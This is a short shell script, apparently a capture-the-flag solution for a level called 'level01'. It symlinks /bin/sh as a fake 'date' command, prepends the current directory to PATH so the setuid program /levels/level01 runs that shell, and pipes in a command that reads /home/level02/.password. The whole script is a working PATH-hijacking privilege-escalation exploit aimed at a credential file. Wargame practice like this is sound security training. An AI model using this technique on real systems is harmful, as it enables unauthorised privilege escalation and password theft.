#!/bin/sh ln -s /bin/sh ./date echo "cat /home/level02/.password" | PATH=.:$PATH /levels/level01 | cut -d ' ' -f 3 rm ./date